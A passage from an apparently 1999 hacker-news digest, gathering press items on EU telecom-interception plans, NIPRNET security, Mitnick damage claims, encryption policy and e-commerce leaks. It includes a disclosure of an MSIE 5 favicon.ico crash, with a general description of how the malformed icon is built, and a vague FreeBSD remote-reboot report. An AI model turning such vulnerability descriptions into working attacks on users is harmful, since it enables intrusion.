meeting in Brussels on 11 March, and was issued by the German presidency on 15 March. According to the British government, "the German Presidency has indicated that it hopes to seek agreement to the draft Council Resolution at the Justice and Home Affairs Council in May". The Council will meet on 27-28 May. ENFOPOL 19 still concerns "interception of telecommunications in relation to new technologies". But instead of detailing massive new requirements for tapping the Internet and other new communications systems, the police group is now pretending that it is not a new policy at all. Referring to the first European tapping plan of 1995, ENFOPOL 19 says that "the requirements of law enforcement agencies ... are applicable both to existing and new communications technologies, for example satellite telecommunications and Internet telecommunications". Thus, it claims, the "technical terms" in the 1995 plan "are to be interpreted as applying to ... in the case of the Internet, the static and dynamic IP address, credit card number and E-mail address". In fact, the 1995 policy says nothing about credit card numbers being used to tap telecommunications. The new document points out that when tapping the Internet, it is not necessary to ask for the details of the sender and the recipient, because these are included in every "datagram" or IP packet. So new regulations for the Internet may not be needed. But this is a deceptive manoeuvre. Successive redrafts of ENFOPOL 98 reveal that the original, highly controversial plan exposed by Telepolis has been broken up into at least five parts, which are now being handled separately: Plans for tapping Iridium and other satellite-based personal communications systems have been separated and are being discussed at a high level in the Commission; Part of ENFOPOL 98 which set out new requirements for personal data about subscribers will be included in "other Council Resolutions to be adopted"; Another resolution will require Internet Service Providers to set up high security interception interfaces inside their premises. These "interception interfaces" would have to be installed in a high security zone to which only security cleared and vetted employees could have access. This is not included in ENFOPOL 19; ENFOPOL 19 also suggests that some tapping systems could operate through a "virtual interface". This would mean installing special software at Internet access points, controlled remotely by government security agencies. A fourth new policy concerning cryptography is now being dealt with separately. The police group now plan that the old and new resolutions will be put into a monitoring "manual", together with detailed instructions on intercepting the Internet. This will include "technical descriptions" which have been taken out of the original ENFOPOL 98 . If this manoeuvre succeeds, then ENFOPOL 98 will escape scrutiny by being smuggled through in parts, while the European Parliament is dissolved (because of the June Euro-elections). But the biggest secret about ENFOPOL 98 has never been told, until now. The controversial document wasn't written by European governments or the European Commission. Both ENFOPOL 98 and Europe's 1995 monitoring policy were written by a US-dominated group of security and law enforcement agency experts, called ILETS. This group does not include any industry or human rights and privacy law advisers. Over the last six years, ILETS has single-handedly forced governments and international standards bodies to build in their "requirements" to laws, networks and new communications systems. Their activities have never been reported to national Parliaments, the European Parliament or even the US Congress. Not until Telepolis revealed the ENFOPOL 98 affair has the secret ILETS organisation been exposed or challenged. @HWA 04.0 NIPRNET to beef up security by *koff* installing firewalls...(wah hahahahaha) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NIPR to install Firewalls to Thwart Hackers From HNN http://www.hackernews.com/ contributed by erehwon The factual inaccuracies in this article are blatant. The Defense Information Systems Agency (DISA) plans to redesign its Non-Classified Internet Protocol Router Network (NIPRNet). While this article touts this 'redesign' as some sort of massive undertaking it sounds like they are just going to install a few firewalls. Oh, yeah, that will keep all the hackers out. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0503/fcw-newsdodnet-5-3-99.html MAY 3, 1999 DOD net overhaul to thwart hackers BY BOB BREWIN (antenna@fcw.com) The Defense Department has started an overhaul of its global unclassified network to fight off the barrage of hacker attacks the department's systems suffer and to increase capacity to handle a huge rise in traffic to and from the Internet. The Defense Information Systems Agency plans to redesign its Non-Classified Internet Protocol Router Network, DOD's primary entry into commercial World Wide Web sites, to take advantage of enhanced security measures and to improve overall performance. The NIPRNET redesign, scheduled for completion in December with main network components slated for installation no later than June, will provide DOD with a network better designed to stave off hacker attacks that hit DOD systems at a rate of 250,000 a year, according to a DOD source briefed on the network plan. Tony Montemarano, chief of Defense Information Systems Network services for DISA, said the agency is well on its way with the NIPRNET upgrade. "The equipment is purchased, and we are upgrading software loads," Montemarano said. He said that besides providing security, the NIPRNET upgrade also will provide "protection against denial-of-service attacks.... We want to be able to guarantee the availability of the network as well as provide additional security for the users." DISA's plans include the filtering of what DISA called "notorious" protocols routinely exploited by hackers, according to briefing slides obtained by Federal Computer Week. The protocols include the PostOffice Protocol (POP), which allows remote users to read e-mail stored on a central server; remote-access protocols, which allow users to read their e-mail from another system; and Packet Internet Groper (Ping), which hackers use to disable networks by overloading them with a command. According to the briefing slides, DISA plans to start filtering out these protocols by July. But the agency said it has not made any decision yet on which protocols to filter. Montemarano declined to quantify the degree of security that the NIPRNET upgrade will provide, except to say, "It will be better...and performance will be improved considerably." DISA is doubling the number of NIPRNET connections to the Internet because of the huge increase in traffic spurred by the development of the World Wide Web and the amount of information residing on Web sites outside NIPRNET, Montemarano said. "There is so much information out there our users want," he said. Increasing capacity also is a security measure. The inability of NIPRNET to handle the loads imposed by Web traffic without lags or delays had resulted in numerous military commands installing Internet "backdoors" on their systems. DISA is looking to eliminate such backdoor connections. According to the DISA briefing, no unit or command will be allowed to connect a local- or wide-area network to NIPRNET until the network goes through a formal connection approval process. Rear Adm. John Gauss, commander of the Space and Naval Warfare Systems Command, said he believes the NIPRNET redesign offers a better security alternative than the almost total retreat from the Internet advocated by Lt. Gen. William Campbell, the Army's director of information systems for command, control, communications and computers. "Campbell accurately addressed the threat," Gauss said, "but the thing I have to ponder is, [considering] the amount of electronic commerce we do with industry, is it viable just to disconnect from the Internet? What DISA is doing will protect DOD computing and still give us a viable means of communicating with industry." @HWA 05.0 Mainstream media questions some of Mitnicks accrued damages ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Hacker" Racks up $291.8 Million in Damages. From HNN http://www.hackernews.com/ contributed by Weld Pond Finally some mainstream press about the outrageous claims made by NEC America Inc., Nokia Mobile Phones, Sun Microsystems Inc. and Novell Corp. These companies claim substantial losses that they have attributed to Kevin Mitnick. LA Times http://www.latimes.com/HOME/BUSINESS/CUTTING/t000039748.1.html Letters citing damages http://www.hackernews.com/orig/letters.html FREE KEVIN http://www.freekevin.com Heard on the Beat Firms Say Hacker Cost Them $291 Million By GREG MILLER LA Times For a guy who never seemed to profit from his hacking habit, Kevin Mitnick sure took a big bite out of the high-tech economy, if newly disclosed damage estimates from his victim companies are to be believed. Mitnick's hacking cost high-tech companies at least $291.8 million over a two-year span before his capture, according to estimates provided to the FBI by NEC America Inc., Nokia Mobile Phones, Sun Microsystems Inc. and Novell Corp. The damages are listed in previously undisclosed letters that were obtained by 2600 magazine, a pro-hacker publication that has posted the letters on its Web site. The damage estimates vary widely. NEC said Mitnick stole software code worth $1.8 million. But Nokia figures Mitnick cost the company at least $135 million, including $120 million in lost revenue "due to new developments being delayed in reaching the market." Skeptics say the estimates border on fantasy and point out that the companies did not report these hefty setbacks in public financial statements.But the estimates underscore the ambiguities of assessing damages in hacking cases.Some argue that hackers should be accountable for the cost of developing the software they steal, even though they are only taking a copy. Mitnick himself once argued that was akin to saying someone who shoplifts a 49-cent Bic pen ought to be accountable for the millions of dollars Bic has spent developing and marketing it.The issue is still significant for Mitnick, who pleaded guilty to various hacking charges last month but awaits a ruling on the restitution he will be ordered to pay victims. "We're going to make a submission for an amount of restitution we consider appropriate," said Assistant U.S. Atty. Chris Painter, "not necessarily the full amount of the loss that was caused." Copyright 1999 Los Angeles Times. All Rights Reserved @HWA 06.0 CyberCrooks easier to catch? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sangfroid This Associated Press article seems to think that cyber crooks are easier to catch. Using the authors of Melissa and CIH as well as the man who posted a false news story causing fluctuations in a companies stock as examples for this claim. Unfortunately the author has little or no understanding of how the net actually works.Bad guys are not getting easier to catch there are just more stupid ones. Las Vegas Sun http://www.lasvegassun.com/sunbin/stories/tech/1999/apr/30/043000242.html April 30, 1999 Catching Hackers Becoming Easier ASSOCIATED PRESS NEW YORK (AP) -- They never unmasked the hacker responsible for Michelangelo, a famous computer virus that threw a scare into the high-tech world in 1992. But it took just days to identify the people believed responsible for two viruses that struck this year. Cybercops also had no trouble finding the man who allegedly posted a fake news story this month about a corporate merger that caused one company's stock to gyrate. In at least two of these cases, investigators used the digital footprints that every user of the Internet leaves behind to trace the source of the trouble. While this may force virus writers or hoaxers to think twice before they strike, it also shows how easy it is for anyone -- a government investigator or a skilled salesperson -- to follow your every online move. "The same technology that tracks individuals is used to solve crimes and vice versa," said Ari Schwartz, a policy analyst for the Center for Democracy and Technology, an Internet civil liberties group in Washington. "It's melded into one kind of surveillance technology which could lead to an erosion of privacy." Actually, there's nothing all that complicated about how the law enforcers crack a case on the World Wide Web. In fact, it's similar to the way telephone records are used by investigators. The online accounts that most people use to roam the Web or send e-mail are assigned a unique stamp, or "Internet protocol address," that helps direct the exchange of data between a Web site and its visitors. Those IP addresses leave digital footprints that -- unfortunately for the ill-intentioned -- don't get wiped out as easily or quickly as a trail of bread crumbs. Little is known about Chen Ing-hau, the 24-year-old Taiwanese man identified on Thursday as the author of Chernobyl, a virus that crippled hundreds of thousands of computers this week. But IP addresses were clearly pivotal in tracking down the alleged merger hoaxter, Gary Dale Hoke. The 25-year-old North Carolina man was arrested two weeks ago after he allegedly posted a fictional story April 7 saying his employer, PairGain Technologies, was about be taken over by another company. The false report caused PairGain's stock to rise sharply, then fall after the hoax was uncovered. Hoke, officials said, attempted to conceal his identity with pseudonyms and fake e-mail addresses, but was identified through an IP address. He was charged Friday with five counts of securities fraud, punishable by up to 50 years in prison and $5 million in fines. IP addresses were also used to track down David L. Smith, a 30-year-old network programmer from New Jersey accused of creating the Melissa e-mail virus with a stolen America Online account. Melissa, allegedly named after a topless dancer in Florida, appeared on March 26 and spread rapidly around the world, clogging e-mail accounts and shutting down computer networks worldwide. But IP addresses weren't the only clues used in the Melissa investigation, and that's what troubles privacy advocates. The main difference in the Melissa investigation was the use of a serial number embedded in documents written with the popular program Microsoft Word. "We could go around society with tattoos on our forehead and cameras everywhere, but most people wouldn't like that. But that's what these serial numbers do," said Schwartz, whose organization has filed a federal complaint over a similar serial number embedded in Intel's new Pentium III computer chip. "Law enforcement has a lot of tools out there to find out who these people are. We want them to find crooks," Schwartz said. "But when we make technology, do we want technology that brands individuals, that's puts our serial numbers everywhere as we visit? There has to be some sense of anonymity online." @HWA 07.0 Nasa has security concerns, doesn't report cyberattacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erewhon Roberta Gross, NASA's inspector general, told a Senate subcommittee that parts of NASA are failing to report cyber attacks and that some do not have proper security in place. She went on to claim that an internal NASA organization, NASA's Automated Systems Incident Response Capability, was not performing its job adequately. Federal Computer Week http://www.fcw.com/pubs/fcw/1999/0503/fcw-newnasa-5-3-99.html (ed's note, this gave me a 404 when I tried it i'll try and find the correct link and post the article here) Roberta Gross also is quoted in this article as saying that although the attacks where not reported her office learned of them from "other ways". Hmmmmm, wonder what that means @HWA 08.0 Encryption debate called for ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee said he would like to see a campaign-style debate on encryption pitting members of Congress and the Clinton administration against U.S. lawmakers. CNN http://www.cnn.com/TECH/computing/9905/04/encryption.idg/index.html U.S. advisor seeks full-blown debate on encryption May 4, 1999 Web posted at: 7:51 a.m. EDT (1151 GMT) by Margret Johnston (IDG) -- The chairman of an organization that advises the U.S. Congress on Internet issues yesterday said he would like to see a campaign-style debate on encryption pitting members of Congress and the Clinton administration who oppose relaxing U.S. encryption laws against U.S. lawmakers who favor loosening them. Jerry Berman, chairman of the Congressional Internet Caucus Advisory Committee, said he would push for the debate to be held sometime this year. He added that he would favor participation from U.S. lawmakers who have spoken out against relaxing U.S. restrictions on the export of encryption technology above 56 bit. "I want a face-to-face debate," Berman said during a luncheon for congressional staff members sponsored by the caucus. "Let them go at it." Sen. Diane Feinstein (D-Calif.) and Rep.Michael Oxley (R-Ohio) would be ideal participants, Berman said. And the director of the FBI Louis Freeh would be another good candidate to take part in the debate.But there has been no agenda or date set for the event, Berman said. The two lawmakers and Freeh have opposed legislation that would change the current U.S. encryption law on the grounds that it would weaken law enforcement's ability to catch suspected criminals, particularly terrorists and drug dealers, because they could use the high-level encryption to prevent access to potential evidence stored on their computers. Supporters of a change in U.S. encryption law say those arguments are baseless because high-level encryption is easily obtainable and the U.S. law has only hamstrung American businesses who want to sell and use such encryption outside the U.S. Berman announced that, in addition to the encryption forum, the caucus by year-end would hold forums on privacy, content and broadband technology. "The goal is to educate policy makers about the Internet as a technology," Berman said. "We need to explain to policy makers what these issues are." The Internet Caucus Advisory Committee comprises 120 public interest groups, corporations and associations. Members typically favor maintaining the decentralized, deregulated global aspects of the Internet, Berman said. He added that the caucus got off the ground because Congress passed the Communications Decency Act (CDA) without first asking itself whether it fully understood technology and how the Internet works. The CDA was later ruled unconstitutional by the Supreme Court. @HWA 09.0 Product: Hackers stopped cold by 'BlackICE'? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/TECH/computing/9904/22/blackice.idg/ Start-up puts hackers on BlackICE April 22, 1999 Web posted at: 1:35 p.m. EDT (1735 GMT) by Ellen Messmer (IDG) -- Network Ice, a hot security start-up for intrusion detection, this June plans to ship its first software-based suite for stopping the wily hacker cold. To protect Windows-based desktops and servers from hack attacks, Network Ice is providing software called BlackICE Pro. If BlackICE software spots evidence of mischief, it responds by alerting the user or the administrator of the problem. It can also shut down all communication to and from the source of the intrusion attempt. BlackICE Pro software, which costs $37 per node for 1,000 nodes, will issue a report of any trouble to the Web-based security management console called ICEcap (an acronym for "consolidation, analysis and presentation"). According to Greg Gilliom, CEO of Network Ice, the ICEcap reporting engine uses a technology dubbed "Collective Awareness" to analyze the nature of the intrusion attempt. If needed, it will inform all BlackICE-protected desktops or servers if a systemic corporate-wide attack appears to be under way. Since hackers are constantly upgrading their attack exploits, the BlackICE software is going to have to be updated regularly, much like anti-virus software, Gilliom points out. To do this, ICEcap can "push" intrusion-detection updates down to BlackICE software without disrupting computer activity. "We detect over 200 attack signatures, such as ping sweeps or denial-of-service attacks," Gilliom claims. "We're protocol experts - we know how to exploit protocols. But we're trying to provide a system of administration and protection for small companies that aren't aware of all these issues." Gilliom and the other Network Ice co-founders Robert Graham and Clinton Lum all held senior engineering positions at Network General (now Network Associates after its merger last year with McAfee Associates). The BlackICE suite is host-based intrusion-detection software for Windows. The start-up is also working on an NT-based probe called BlackIce Sentry that would be able to scan for trouble Unix machines, mainframes or databases. The company has no specific shipping date for BlackIce Sentry. Network Ice Chief Technology Officer Robert Graham says that one of the most vulnerable points within the enterprise network today is that presented by the telecommuter or remote access user. "The problem with VPNs and notebook computers is that firewalls are being bypassed by remote dial-in users," Graham says. "When we've put our software on a lot of people's machines, we see virtually everyone will undergo a hacker attack within just a few weeks." This is because the hackers with their automated tools are targeting remote access users to find out their IP addresses or access methods in order to weasel their way into the corporate intranet, Graham claims. Therefore, even companies using VPNs or firewalls can benefit from a desktop-based intrusion-detection system used for remote access. "We see three types of hackers out there," Graham says. "There are voyeurs, like peeping toms; graffiti artists that trash the Web site and tell their friends; and criminals who steal things, such as customer lists." @HWA 10.0 FreeBSD 3.1 remote reboot exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Message-ID: <19990501031840.A24252@dilbert.exodus.net> Date: Sat, 1 May 1999 03:18:40 -0500 Reply-To: jamie@exodus.net Sender: Bugtraq List From: Jamie Rishaw Subject: FreeBSD 3.1 remote reboot exploit To: BUGTRAQ@netspace.org Hi, Sorry to be so vague, but I wanted to let everyone know, It's been demonstrated to me by two people who will not reveal "how" that there is a remote bug exploit, almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's @HWA 11.0 More on the MSIE favicon.ico bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://web.cip.com.br/flaviovs/sec/favicon/index.html MSIE 5 favicon bug Description There's a bug in MSIE 5 when handling the favicon.ico file downloaded from a web site. By creating a icon file with bad data, it's possible to crash MSIE 5. The stack is filled with information from the icon file so it may be possible to create an icon file with data which would end executing code on the client machine. The favicon.ico icon file The favicon.ico file is an icon file in the MS-proprietary icon file format. It is downloaded by MSIE 5 when the user asks it to add the page's URL to his/her "Favorites" list. When the user selects to add the URL, MSIE 5 downloads the file and shows the icon on the "Favorites" menu. The request for the favicon.ico file is first done on the same path of the current URL. If the file is not found, MSIE 5 will backup one directory in the directory hierarchy and try again. It will do this until it finds the file or reaches the web server root (e.g. if you try to bookmark this page, MSIE 5 will look for favicon.ico in http://web.cip.com.br/flaviovs/sec/favicon/, http://web.cip.com.br/flaviovs/sec/, http://web.cip.com.br/flaviovs/ and http://web.cip.com.br/). Impact MSIE 5 will crash when trying to interpret/show such icon file. It's unknown if it's possible to create an icon file which will trigger code execution on the client machine, but evidences show that it may be possible (i.e. it looks like a stack buffer overflow). Workaround It seems it's not possible to turn off the favicon.ico loading feature. Thus the only workaround is not to add any non-trusted site to the "Favorites" list and wait for a patch from Microsoft. Example If you're using MSIE 5 with Javascript enabled, you can feel the bug in action. Otherwise just try to bookmark this page (note: this will crash your browser). Here's the favicon.ico file that triggers the bug. It's composed of an bogus header followed by lots of "A" characters. What Microsoft is Doing Apparently, nothing. I reported the bug twice, the first one about one month ago, the last time about two weeks ago. I didn't receive any reply. Disclaimer All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by the use or minuse of information here contained. Related Documents Web Workshop Getting Ready for Internet Explorer 5 http://msdn.microsoft.com/workshop/essentials/versions/ICPIE5.asp Apache Week: 9th April 1999 http://www.apacheweek.com/issues/99-04-09 Privacy Issues about the favicon.ico File (below) About This bug was discovered in april 1999 by Flavio Veloso . Privacy Issues about the favicon.ico File Description Every time you bookmark a page in MSIE 5 it will send to the web server a request for a file named favicon.ico (see "MSIE 5 favicon bug" for an explanation about what this file is, along other nice things). This give to web servers admins a way to know that someone has bookmarked it's site; the info includes the date and time of the operation plus the address IP of the machine which bookmarked the site. This may or may not bother you. Impact MSIE 5 will reveal to web servers admins that you bookmarked their sites. Workaround It seems that it's not possible to turn off this feature, so if this bother you, don't bookmark sites with MSIE 5 or don't use it at all. What Microsoft is Doing Microsoft was not contacted about this issue. They were already informed about a a much more dangerous issue about the favicon.ico file and took no measure to fix it in about one month. I don't have plans to contact them about this privacy issue just because I don't want to waste my time anymore with this. Disclaimer All information contained in this page is for EDUCATIONAL PURPOSES ONLY. The author of this page can not be made responsible for any damage caused by the use or minuse of information here contained. About This issue was discovered in april 1999 by Flavio Veloso . @HWA 12.0 Simple Nomad sheds some light on the Phone Masters ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Last week we followed up a story from HNN on the Phone Rangers/Phone Masters the actual proper group name was the PHONE MASTERS and NOT the 2600 group the Phone Rangers, we aplogize for the inaccuracy. From HNN http://www.hackernews.com More Info on Phone Masters contributed by Simple Nomad Simple Nomad sheds some light on the Phone Masters and the latest reporting on the GTE Telecom hacking. This is an HNN exlusive. HNN Report (See below) HNN correction: Correction: We made an error on Friday and mentioned the "Phone Rangers" as the group that broke into GTE's telecom network. This was the "Phone Masters". Phone Master Hacks By: Simple Nomad Robert Riggs, the reporter for WFAA who reported the "cyber-terrorism" story http://www.wfaa.com/news/9904/29/ cyber_terrorism_1.html, had contacted me about two weeks ago as he was preparing the story. I was requested to appear on camera and discuss how vulnerable the nation's infrastructure was. I am glad I declined, considering the FUD. The sad thing about this story is that just talking with Riggs about what had happened was actually quite interesting, and I thought he had quite a scoop. But since his report lacked a lot of the details, here is what I know. The Phone Masters were a group of experienced phreakers and hackers, who had been infiltrating GTE, Sprint, MCI, and several Baby Bells. They had access to pretty much everything. GTE, the Bells, and the others had no idea these guys were into their systems. They apparently had access to pretty much everything, hence they had the ability to "wreak havoc". There have been at least 7 arrests that I am aware of, including 5 of the group and 2 private investigators in Dallas. The charges supposedly range from various computer crimes to various phone fraud felonies. I suspect there will be a conspiracy charge as well. There appears to have been two distinct philosophies at work here, one criminal, and one VERY criminal. Part of the Phone Masters were profitting financially from the hacks, while part were just exploring the phone systems. It appears the reason they were caught is that one of the non-profitting guys became angry after learning of the guys selling information, and ratted them out. Had this not happened, they'd still be deep inside the phone systems. The Feds and the phone companies feel comfortable they have all of "them" out of the phone systems and that the nation can rest easy. A real interesting thing with this case is that it supposedly marked the first time the FBI used taps on phone lines that allowed the Feds to view the online sessions. I wish I had more technical detail here, Riggs referred to it as an "analog" trace, but the basics seemed to be somewhat like the Shimomura "videos" of Mitnick at http://www.takedown.com/. I'm willing to bet a certain Mr. Shimomura helped set the Feds up with this capability. The main alleged criminal things were that several of the Phone Masters were selling credit reports and other personal info (hence the arrest of the 2 PI's, who were "information brokers"), selling of long distance access codes, and pilfering and exploitation of credit card numbers. This is probably the main area where the Feds will make their case, being that it is more "criminal" than simply gaining access and poking around, although my guess is any conspiracy charge will put all of them in jail for a long time. At the time I spoke to Riggs, he was aware of only one time when some of these guys informed a suspected drug dealer (in Colorado, I believe) that there was a tap on his phone, apparently blowing some big DEA investigation. My source on all this was based on my email and phone conversations with Riggs, and putting two and two together after reading the online version of the story and recalling what Riggs said. @HWA 13.0 Israeli Sciemtist reports advance in codebreaking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Israeli Scientist Reports Discovery of Advance in Code Breaking contributed by weld Shamir, the 'S' in RSA, has developed a new device that makes factoring the large numbers used in public key cryptograpy much easier. This makes those 512 bit PGP keys potentially vulnerable. You did pick 1024 bit didn't you? NY Times http://search.nytimes.com/books/search/bin/fastweb?getdoc+cyber-lib+cyber-lib+11455+0+wAAA+Shamir May 2, 1999 Israeli Scientist Reports Discovery of Advance in Code Breaking By JOHN MARKOFF An Israeli computer scientist is expected to shake up the world of cryptography this week when he introduces a design for a device that could quickly unscramble computer-generated codes that until now have been considered secure enough for financial and government communications. In a paper to be presented Tuesday in Prague, the computer scientist, Adi Shamir, one of the world's foremost cryptographers, will describe a machine, not yet built, that could vastly improve the ability of code breakers to decipher codes thought to be unbreakable in practical terms. They are used to protect everything from financial transactions on the Internet to account balances stored in so-called smart cards. Shamir's idea would combine existing technology into a special computer that could be built for a reasonable cost, said several experts who have seen the paper. It is scheduled to be presented at an annual meeting of the International Association for Cryptographic Research, which begins on Monday. The name of Mr. Shamir, a computer scientist at Weizmann Institute of Science in Rehovoth, Israel, is the "S" in R. S. A., the encryption design that has become the international standard for secure transmissions. He is a co-inventor of R.S.A. -- with Ronald Rivest of the Massachusetts Institute of Technology and Leonard Adleman of the University of Southern California. R.S.A. is known as public-key cryptography. In this system, a person has a public key and a private key. The public key is used to scramble a message and may be used by anyone, so it can, even should, be made public. But the private key that is needed to unscramble the message must be kept secret by the person who holds it. R.S.A., like many public-key systems, is based on the fact that it is immensely difficult and time-consuming for even the most powerful computers to factor large numbers. But Mr. Shamir's machine would make factoring numbers as long as about 150 digits much easier, thus making it much simpler to reveal messages scrambled with public-key encryption methods. A number of advances in factoring have been made in the last five years. But most of them are the result of applying brute force to the problem. When R.S.A. was created in 1977, Mr. Shamir and his colleagues challenged anyone to break the code. Employing 1970's technology, they said, a cryptographer would need 40 quadrillion years to factor a public key, and they predicted that even with anticipated advances in computer science and mathematics, no one would be able to break the code until well into the next century. In fact, a message the trio had encoded with a 129-digit key successfully withstood attack for only 17 years. It was factored by an international team of researchers in 1994. Using Mr. Shamir's machine, cracking the 140-digit number would be reduced to the difficulty of cracking a key about 80 digits long -- relatively easy by today's standards. Researchers said that if his machine worked it would mean that cryptographic systems with keys of 512 bits or less -- that is, keys less than about 150 digits long -- would be vulnerable in the future, an exposure that would have seemed unthinkable only five years ago. The longer 1,024-bit keys that are available today would not be vulnerable at present. 14.0 Ecommerce being hit hard by the shopping carts scandal? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Companies That Ignore Online Security Are Risking Customers contributed by weld The noise of all these online shopping cart security lapses has finally made the mainstream. Guess what? Some e-commerce sites have not hired anyone with security expertise to audit their sites. Some sites say since they use SSL that they are secure. They just don't get it do they. So the armored truck transferring the data is secure but what about the endpoints. NY Times http://www.nytimes.com/library/tech/99/05/cyber/commerce/03commerce.html By BOB TEDESCHI Companies That Ignore Online Security Are Risking Customers To placate those who worry about how secure it is to shop online, companies typically proffer the idea that buying on the Internet is no more risky than giving a credit card to a waiter in a restaurant. Given recent reports of E-commerce security lapses, that analogy may be giving waiters a bad name. Analysts and executives agree that a vast majority of E-commerce sites are secure, but some say the trend may actually be heading in the opposite direction. Many companies so fear being overtaken by a competitor who got to the Web first -- of "getting Amazoned," in the industry vernacular -- that they rush past security issues in their zeal to establish a Web site. Some companies lack the technical knowledge to use security safeguards; others say they cannot afford security products and advice. And there are those who simply do not consider it a priority. "I wish I had a dollar for every one of my clients that said, 'I don't care if the transaction is really secure; I just need my customers to think it is,'" said Larry Erlich, partner at Domainregistry.com, a Philadelphia company that registers Internet addresses and provides Web consulting services. In the case of one recently disclosed security problem, though, the issue seems to have been not a lack of concern by the Internet retailers but a limited technical knowledge. Two weeks ago, a Seattle Internet service provider, Blarg Online, reported that several software products that were used to create the "shopping cart" technology employed by some Web retailers could leave credit card numbers and other personal data exposed on a company's server, if the software was improperly installed. Those wishing to get at that information simply needed to type a few words and numbers into a search engine like Alta Vista, and they would have been able to get access to a compromised site's data files. The makers of the software say they have addressed the problem, but industry experts said problems involving other software and other Web sites could follow closely behind. One reason, said David Taylor, a vice president at the Gartner Group, a Stamford, Conn., research firm, is that many Internet companies have realized the value in collecting and selling customer data, "and in their quest for that data, people are being less than judicious about how they gather that information." Even the leading Internet companies are not immune to security problems. Earlier this month, for example, Yahoo acknowledged that customer data of one of its merchants had been exposed to the public. In that incident, customers of Vitanet, a retailer of nutritional products, had their addresses, order information and partial credit card numbers posted on a demonstration site that Yahoo had set up for study by would-be Web merchants. Only after being alerted to the security lapse several weeks later did Yahoo correct the problem, which it attributed to a software bug. Despite that stumble by Yahoo, many experts say that those most vulnerable to security flaws are small and medium-size sites. First, smaller operations often lack the money to hire security auditors -- which can cost $15,000 or more for a one-week sweep of a site -- and they generally lack the internal expertise to perform such audits themselves. Second, because they typically operate with a lean technical staff, such sites tend to rely on one software vendor for security needs. In fact, it requires more than one type of software to secure a site, security experts say. Still, some consultants say it is really not very expensive to provide at least a basic level of security. "If you're going ballistic with security, you could spend a lot of money," said Mamoon Yunus, a regional manager for i.Informix, the E-commerce division of the computer services company Informix. But otherwise, he said, "it needn't cost a lot." For instance, software designed to encrypt customer information as it travels to the seller, such as that sold by Verisign, costs $350 a year. And through companies like Cybercash, E-commerce sites can get credit card encryption and processing services set up for roughly $400, plus a fee of 20 to 25 cents a transaction. And for as little as $30 a month, smaller merchants can get secure online storefronts through companies like Cybercash and Internet providers. "Basically, there's no reason to have a security problem, except for a failure to do the homework," said Steven Kramer, president of the Picture Palace, an online retailer of rare and unusual movie videos. Those who run E-commerce sites say there is one additional issue deterring elaborate security systems: the customer's desire to move quickly through a transaction. For increased security, customers would have to go through multiple layers of registration and identity verification before buying, and many would bristle at the inconvenience, said Steven Rabin, chief technologist for Interworld, which develops sites for a number of large retailers. But Taylor, of Gartner Group, said that if reports of security breakdowns continued, E-commerce companies could be under increased pressure to regulate themselves if they do not want the Government to intervene. Taylor said more E-commerce sites should follow the lead of Gateway, the computer seller. In its privacy and security statement, Gateway asserts that "none of the tens of thousands of people who have made purchases through Gateway's Web site using SSL" -- secure sockets layer technology -- "have reported fraudulent use of their credit card as a result of their online order." When asked if, in the event of a security breakdown, Gateway would post information about it and the company's response, Chuck Geiger, Gateway's vice president for E-commerce, said: "It's a good idea, but I'd have to consult with our legal and public relations folks. But in terms of full disclosure and being honest, it makes sense." Taylor said that getting the entire industry to follow Gateway's example could be difficult, though. "The minute these companies start talking about security, they run the risk of bringing the party to a halt," he said. "But this is something the Government could impose, because it wouldn't be expensive for a merchant to do." The E-COMMERCE REPORT is published weekly, on Tuesdays. @HWA 15.0 Computer crime threatens the economy?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www,hackernews.com/ Computer Crime Threatens US Economy contributed by Simple Nomad So now all credit card crooks are hackers. Don't be hitting those URLs for the shopping cart transaction log files or you will be labled a super hacker. The one thing that the article has right is how inept local law enforcement is in catching crooks on the internet. The Dallas Police disbanded their computer crime squad because they couldn't get any qualified help. WFAA-TV News http://www.wfaa.com/news/9904/30/cyber_terrorism_2.html N E W S 8 I N V E S T I G A T E S Computer Crime Threatens U.S. Economy by Robert Riggs April 30 1999 DALLAS -- The FBI says a disturbing trend of hacker attacks and computer crime threaten our nation's economy. Specialized computers called web servers store information about customers who buy products over the Internet. If a web server is not secure, hackers can literally take all of the confidential information stored within, and anyone can become a victim. ONE VICTIM'S STORY Computer security expert David Dunagan never expected to become a victim of computer fraud. Then, a thief stole his identity and his credit card number and ordered a notebook computer over the Internet. Now Dunagan knows first hand just how easy it is. "You are one of millions of transactions a day to somebody, and they don't have time to see who you are, take your credit card, say, 'thank you.' It's just boom, boom, boom, get as many transactions as we can," he said. Dunagan recently came to News 8 